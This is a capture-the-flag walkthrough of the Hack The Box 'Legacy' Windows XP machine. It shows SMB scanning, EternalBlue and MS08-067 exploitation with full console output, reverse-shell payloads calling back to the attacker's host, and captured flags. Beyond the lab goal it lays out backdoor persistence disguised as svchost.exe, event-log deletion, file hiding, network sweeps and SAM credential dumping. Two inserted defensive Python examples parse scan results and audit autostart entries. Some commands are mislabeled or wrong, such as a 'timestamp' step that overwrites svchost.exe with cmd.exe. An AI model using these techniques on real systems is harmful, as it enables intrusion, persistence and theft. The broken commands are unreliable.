Machine Synopsis
Key Exploitation Techniques:
- SMB protocol enumeration and vulnerability assessment
- EternalBlue remote code execution (MS17-010 / CVE-2017-0143)
- Alternative MS08-067 exploitation path
- Immediate SYSTEM access without privilege escalation
Reconnaissance & Enumeration
Port Discovery
$ nmap -p- --min-rate 10000 10.10.10.4
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp closed ms-wbt-server
Service Enumeration
$ nmap -p 139,445,3389 -sC -sV 10.10.10.4
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| OS CPE: cpe:/o:microsoft:windows_xp::-
| Computer name: legacy
| NetBIOS computer name: LEGACY\x00
| Workgroup: HTB\x00
|_ System time: 2022-02-07T15:47:41+02:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
Vulnerability Assessment
# Comprehensive vulnerability scan
$ nmap --script vuln -p 139,445 10.10.10.4
Host script results:
| smb-vuln-ms08-067:
| VULNERABLE:
| Microsoft Windows system vulnerable to remote code execution (MS08-067)
| State: VULNERABLE
| IDs: CVE:CVE-2008-4250
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
Critical Vulnerabilities:
- MS17-010 (EternalBlue)
- MS08-067 (Conficker)
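As a defender-side complement to the scans above, here is an added Python example (not code from the original writeup) that parses the nmap NSE output shown in the enumeration and vulnerability-assessment sections and turns it into a prioritised exposure list: end-of-life OS, SMBv1-only negotiation, signing disabled, guest sessions, and every smb-vuln-* script that reports State: VULNERABLE together with its CVE ids. The sample block is constructed from the output above with nmap's normal indentation (plus one "false" script result to show that negatives are skipped); the severity tiers and the list of end-of-life Windows versions are my assumptions.

```python
"""Triage nmap SMB NSE output into prioritised findings.

Added example for this writeup (not code from the original page): parses the
'Host script results' block printed by smb-os-discovery, smb-security-mode,
smb2-time and smb-vuln-* and returns what a defender should act on first.
"""
import re
from dataclasses import dataclass, field

# Constructed sample: the output shown above, with nmap's usual indentation.
SAMPLE_NMAP_OUTPUT = """\
Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-os-discovery:
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|_  System time: 2022-02-07T15:47:41+02:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb-vuln-ms10-054: false
| smb-vuln-ms08-067:
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|_    Risk factor: HIGH
"""

SEVERITY_RANK = {"critical": 0, "high": 1, "medium": 2}      # assumed scale
EOL_WINDOWS = ("Windows 2000", "Windows XP", "Windows Server 2003")


@dataclass
class Finding:
    severity: str
    title: str
    cves: list = field(default_factory=list)


def _strip_prefix(line):
    """Drop nmap's '| ' / '|_' gutter, keeping the script's own indentation."""
    return re.sub(r"^\|_?\s?", "", line).rstrip()


def parse_script_sections(text):
    """Return {script_name: [lines]} for every NSE script block in the output."""
    sections, current = {}, None
    for raw in text.splitlines():
        if not raw.startswith("|"):
            continue                      # port table, 'Host script results:' etc.
        line = _strip_prefix(raw)
        header = re.match(r"^([a-z][a-z0-9-]*):\s*(.*)$", line)
        if header:                        # unindented 'script-name: ...' line
            current = header.group(1)
            sections[current] = [header.group(2)] if header.group(2) else []
        elif current is not None:
            sections[current].append(line.strip())
    return sections


def triage(text):
    """Map the parsed sections to findings, most severe first."""
    sections = parse_script_sections(text)
    findings = []

    for line in sections.get("smb-os-discovery", []):
        os_match = re.match(r"OS:\s*(.+)", line)
        if os_match:
            os_name = os_match.group(1)
            if any(eol in os_name for eol in EOL_WINDOWS):
                findings.append(Finding("critical", f"End-of-life OS, no security updates: {os_name}"))
            break

    if any("negotiation failed" in l for l in sections.get("smb2-time", [])):
        findings.append(Finding("high", "SMBv1-only host (SMB2 negotiation failed); SMBv1 should be disabled"))

    for line in sections.get("smb-security-mode", []):
        if line.startswith("message_signing:") and "disabled" in line:
            findings.append(Finding("high", "SMB message signing disabled (relay/tampering risk)"))
        elif line.startswith("account_used:") and "guest" in line:
            findings.append(Finding("medium", "Guest account accepted for SMB sessions"))

    for name, lines in sections.items():
        if not name.startswith("smb-vuln-"):
            continue
        # Exact state check: 'State: NOT VULNERABLE' must not count as a hit.
        if not any(l.startswith("State:") and l.split(":", 1)[1].strip() == "VULNERABLE" for l in lines):
            continue
        cves = sorted(set(re.findall(r"CVE-\d{4}-\d{4,}", " ".join(lines))))
        desc = next((lines[i + 1] for i, l in enumerate(lines) if l == "VULNERABLE:" and i + 1 < len(lines)), name)
        findings.append(Finding("critical", f"{name}: {desc}", cves))

    findings.sort(key=lambda f: SEVERITY_RANK[f.severity])   # stable: scan order kept within a tier
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_NMAP_OUTPUT):
        print(f"[{f.severity.upper():8}] {f.title} {' '.join(f.cves)}".rstrip())
```

The parser keys on nmap's convention that a script name is the only unindented lowercase-hyphenated token followed by a colon, so nested fields such as `account_used:` or `State:` never start a new section even if the indentation was lost in a copy-paste, as it was in the block above.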
Exploitation
Method 1: EternalBlue (MS17-010)
Manual Python Exploitation
# Download EternalBlue exploit
$ git clone https://github.com/helviojunior/MS17-010.git
$ cd MS17-010
# Verify vulnerability
$ python checker.py 10.10.10.4
Trying to connect to 10.10.10.4:445
Target OS: Windows 5.1
The target is not patched
=== Testing named pipes ===
spoolss: STATUS_ACCESS_DENIED
samr: STATUS_ACCESS_DENIED
netlogon: STATUS_ACCESS_DENIED
lsarpc: STATUS_ACCESS_DENIED
browser: STATUS_ACCESS_DENIED
Payload Generation and Execution
# Generate reverse shell payload
$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.3 LPORT=1234 -f exe > legacy.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes
Saved as: legacy.exe
# Setup netcat listener
$ nc -nlvp 1234
# Execute exploit
$ python send_and_execute.py 10.10.10.4 legacy.exe
Trying to connect to 10.10.10.4:445
Target OS: Windows 5.1
Using named pipe: browser
Groom packets
attempt controlling next transaction
success controlling one transaction
modify parameter count to 0xffffffff to be able to write backward
leak next transaction
CONNECTION: 0x82240020
SESSION: 0xe1a33408
FLINK: 0x7bd48
InData: 0x7ae28
MID: 0xa
TRANS1: 0x78b50
TRANS2: 0x7ac90
modify transaction struct for arbitrary read/write
make this SMB session to be SYSTEM
current TOKEN addr: 0xe1243030
userAndGroupCount: 0x3
userAndGroupsAddr: 0xe1243108
overwriting token UserAndGroups
Sending file legacy.exe...
Opening SVCManager on 10.10.10.4.....
Creating service VXcF.....
Starting service VXcF.....
The NETBIOS connection with the remote host timed out.
Removing service VXcF.....
ServiceExec Error on: 10.10.10.4
nca_s_proto_error
Done
SYSTEM Shell Access
$ nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.4] 1032
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32> whoami
nt authority\system
C:\WINDOWS\system32> hostname
legacy
C:\WINDOWS\system32> cd "C:\Documents and Settings\john\Desktop"
C:\Documents and Settings\john\Desktop> type user.txt
e69af0e4f443de7e36876fda4ec7644f
C:\WINDOWS\system32> cd "C:\Documents and Settings\Administrator\Desktop"
C:\Documents and Settings\Administrator\Desktop> type root.txt
993442d258b0e0ec917cae9e695d5713
Metasploit Exploitation
$ msfconsole -q
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.10.10.4
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 10.10.14.3
msf6 exploit(windows/smb/ms17_010_eternalblue) > check
[+] 10.10.10.4:445 - Host is likely VULNERABLE to MS17-010! - Windows 5.1 x86 (32-bit)
[+] The target is vulnerable.
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 10.10.14.3:4444
[*] 10.10.10.4:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.10.4:445 - Host is likely VULNERABLE to MS17-010! - Windows 5.1 x86 (32-bit)
[*] 10.10.10.4:445 - Connecting to target for exploitation.
[+] 10.10.10.4:445 - Connection established for exploitation.
[+] 10.10.10.4:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.10.4:445 - CORE raw buffer dump (23 bytes)
[*] 10.10.10.4:445 - 0x00000000 57 69 6e 64 6f 77 73 20 35 2e 31 20 32 36 30 30 Windows 5.1 2600
[*] 10.10.10.4:445 - 0x00000010 20 53 65 72 76 69 63 65 20 50 61 63 6b 20 33 00 Service Pack 3.
[+] 10.10.10.4:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.10.4:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.10.4:445 - Sending all but last fragment of exploit packet
[*] 10.10.10.4:445 - Starting non-paged pool grooming
[+] 10.10.10.4:445 - Sending SMBv2 buffers
[+] 10.10.10.4:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.10.4:445 - Sending final SMBv2 buffers.
[*] 10.10.10.4:445 - Sending last fragment of exploit packet!
[*] 10.10.10.4:445 - Receiving response from exploit packet
[+] 10.10.10.4:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.10.4:445 - Sending egg to corrupted connection.
[*] 10.10.10.4:445 - Triggering free of corrupted buffer.
[*] Sending stage (175174 bytes) to 10.10.10.4
[*] Meterpreter session 1 opened (10.10.14.3:4444 -> 10.10.10.4:1033)
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Post-Exploitation Techniques
Persistence Methods
Registry Persistence
# Create backdoor payload
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.3 LPORT=5555 -f exe -o backdoor.exe
# Transfer via SMB or HTTP
$ impacket-smbserver share . -smb2support
# Install backdoor
C:\WINDOWS\system32> copy \\10.10.14.3\share\backdoor.exe C:\WINDOWS\system32\svchost.exe
# Add registry auto-start entry
C:\WINDOWS\system32> reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SecurityUpdate" /t REG_SZ /d "C:\WINDOWS\system32\svchost.exe"
# Verify persistence
C:\WINDOWS\system32> reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
Service Installation
# Create persistent service
C:\WINDOWS\system32> sc create "SecurityUpdate" binpath= "C:\WINDOWS\system32\svchost.exe" start= auto
[SC] CreateService SUCCESS
C:\WINDOWS\system32> sc start "SecurityUpdate"
[SC] StartService SUCCESS
# Setup handler for backdoor connections
$ msfconsole -q
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.10.14.3
msf6 exploit(multi/handler) > set LPORT 5555
msf6 exploit(multi/handler) > exploit
Scheduled Task (Windows XP)
# Create scheduled task using AT command
C:\WINDOWS\system32> at 15:00 /every:M,T,W,Th,F,S,Su "C:\WINDOWS\system32\svchost.exe"
Added a new job with job ID = 1
# List scheduled tasks
C:\WINDOWS\system32> at
Status ID Day Time Command Line
-------------------------------------------------------------------------------
1 Each M T W Th F S Su 3:00 PM C:\WINDOWS\system32\svchost.exe
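Each of the three persistence mechanisms above leaves an artifact a defender can inventory: a Run-key value, a service binpath and an AT job, all pointing at svchost.exe. The following added Python example (not code from the writeup) audits such an inventory. It flags svchost.exe launched from anywhere other than the Service Control Manager (the genuine one runs only as a service with a `-k <group>` argument), core Windows binary names living outside System32, and an on-disk image whose hash no longer matches a golden baseline, which is what catches the copy over the real svchost.exe. The inventory, the hashes and the `Autostart`/`Alert`/`audit` names are constructed for the example; on a live host the entries would be collected with `reg query`, `sc qc` and `at`.

```python
"""Audit Windows autostart entries for the persistence artifacts shown above.

Added example (not from the writeup). Input is a constructed inventory in the
shape a collector would build from 'reg query ...\\Run', 'sc qc' and 'at'.
"""
import hashlib
import re
from dataclasses import dataclass

SYSTEM32 = r"c:\windows\system32"
# Core Windows image names that malware is commonly renamed to.
MASQUERADE_NAMES = {"svchost.exe", "lsass.exe", "csrss.exe", "services.exe", "winlogon.exe"}


@dataclass
class Autostart:
    kind: str       # "run_key" | "service" | "at_job"
    name: str
    command: str    # value data, service binpath or AT command line


@dataclass
class Alert:
    entry: Autostart
    reasons: list


def split_command(command):
    """Return (image_path, arguments), honouring a quoted image path."""
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        return command[1:end], command[end + 1:].strip()
    parts = command.split(None, 1)
    return parts[0], (parts[1] if len(parts) > 1 else "")


def audit(entries, observed_hashes, baseline_hashes):
    """Return an Alert for every entry that trips at least one rule."""
    alerts = []
    for entry in entries:
        image, args = split_command(entry.command)
        image_l = image.lower()
        base = image_l.rsplit("\\", 1)[-1]
        reasons = []

        if base == "svchost.exe":
            # The genuine svchost.exe is only ever started by the Service Control
            # Manager, as a service with a '-k <group>' argument.
            if entry.kind != "service":
                reasons.append(f"svchost.exe launched from a {entry.kind}; the real one is started only by the SCM")
            elif not re.search(r"(^|\s)-k\s+\S+", args):
                reasons.append("svchost.exe service without a -k service group")

        if base in MASQUERADE_NAMES and not image_l.startswith(SYSTEM32 + "\\"):
            reasons.append(f"core Windows binary name outside System32: {image}")

        expected, observed = baseline_hashes.get(image_l), observed_hashes.get(image_l)
        if expected and observed and expected != observed:
            reasons.append("on-disk image differs from golden baseline hash (file replaced?)")

        if reasons:
            alerts.append(Alert(entry, reasons))
    return alerts


def sha256(data):
    return hashlib.sha256(data).hexdigest()


# Constructed data. Real baselines come from a known-good install or vendor catalog.
BASELINE = {
    r"c:\windows\system32\svchost.exe": sha256(b"constructed: genuine svchost.exe bytes"),
    r"c:\windows\system32\ctfmon.exe": sha256(b"constructed: genuine ctfmon.exe bytes"),
}
OBSERVED = {
    r"c:\windows\system32\svchost.exe": sha256(b"constructed: svchost.exe after the copy above"),
    r"c:\windows\system32\ctfmon.exe": sha256(b"constructed: genuine ctfmon.exe bytes"),
}
SAMPLE_ENTRIES = [
    Autostart("run_key", "SecurityUpdate", r"C:\WINDOWS\system32\svchost.exe"),
    Autostart("run_key", "ctfmon", r"C:\WINDOWS\system32\ctfmon.exe"),
    Autostart("service", "SecurityUpdate", r"C:\WINDOWS\system32\svchost.exe"),
    Autostart("service", "Dhcp", r"C:\WINDOWS\system32\svchost.exe -k NetworkService"),
    Autostart("at_job", "1", r"C:\WINDOWS\system32\svchost.exe"),
    Autostart("run_key", "Updater", r'"C:\Documents and Settings\john\svchost.exe"'),
]

if __name__ == "__main__":
    for alert in audit(SAMPLE_ENTRIES, OBSERVED, BASELINE):
        print(f"{alert.entry.kind}:{alert.entry.name} -> {alert.entry.command}")
        for reason in alert.reasons:
            print("    -", reason)
```

Note that the legitimate `Dhcp` service is also alerted, but only on the hash rule: once the real svchost.exe has been overwritten, every service hosted by it runs the replaced binary, so the baseline comparison is the signal that matters most, while the launch-context rules catch the Run key and AT job even without a baseline.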
Defense Evasion
Log Cleanup
# Clear Windows Event Logs (wevtutil is available on Vista and later, not on XP)
C:\WINDOWS\system32> for /f "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"
# Windows XP method: delete the .evt log files directly
C:\WINDOWS\system32> del "C:\WINDOWS\system32\config\*.evt"
# Clear command history
C:\WINDOWS\system32> doskey /history > nul
File Attribute Manipulation
# Hide backdoor files
C:\WINDOWS\system32> attrib +h +s +r C:\WINDOWS\system32\svchost.exe
# Timestamp manipulation
C:\WINDOWS\system32> copy /y C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\svchost.exe
Lateral Movement Preparation
Network Discovery
# Discover network hosts
C:\WINDOWS\system32> for /L %i in (1,1,254) do @ping -n 1 -w 200 10.10.10.%i | findstr "Reply"
# Check for shared resources
C:\WINDOWS\system32> net view \\10.10.10.1
Credential Harvesting
# Dump SAM database
C:\WINDOWS\system32> reg save HKLM\SAM C:\WINDOWS\Temp\sam
C:\WINDOWS\system32> reg save HKLM\SYSTEM C:\WINDOWS\Temp\system
# Search for stored passwords
C:\WINDOWS\system32> dir /s /b C:\ | findstr /i password
C:\WINDOWS\system32> dir /s /b C:\ | findstr /i config
Alternative Exploitation Methods
MS08-067 (Conficker)
msf6 > use exploit/windows/smb/ms08_067_netapi
msf6 exploit(windows/smb/ms08_067_netapi) > set RHOSTS 10.10.10.4
msf6 exploit(windows/smb/ms08_067_netapi) > set LHOST 10.10.14.3
msf6 exploit(windows/smb/ms08_067_netapi) > set TARGET 6 # Windows XP SP3 English (AlwaysOn NX)
msf6 exploit(windows/smb/ms08_067_netapi) > exploit
[*] Started reverse TCP handler on 10.10.14.3:4444
[*] 10.10.10.4:445 - Automatically detecting the target...
[*] 10.10.10.4:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 10.10.10.4:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 10.10.10.4:445 - Attempting to trigger the vulnerability...
[*] Sending stage (175174 bytes) to 10.10.10.4
[*] Meterpreter session 1 opened (10.10.14.3:4444 -> 10.10.10.4:1035)
Manual EternalBlue Variants
# Alternative Python implementations
$ git clone https://github.com/3ndG4me/AutoBlue-MS17-010.git
$ cd AutoBlue-MS17-010
$ python eternal_checker.py 10.10.10.4
$ python eternalblue_exploit7.py 10.10.10.4 shellcode/sc_all.bin
# Another implementation
$ git clone https://github.com/worawit/MS17-010.git
$ cd MS17-010
$ python eternalblue_exploit7.py 10.10.10.4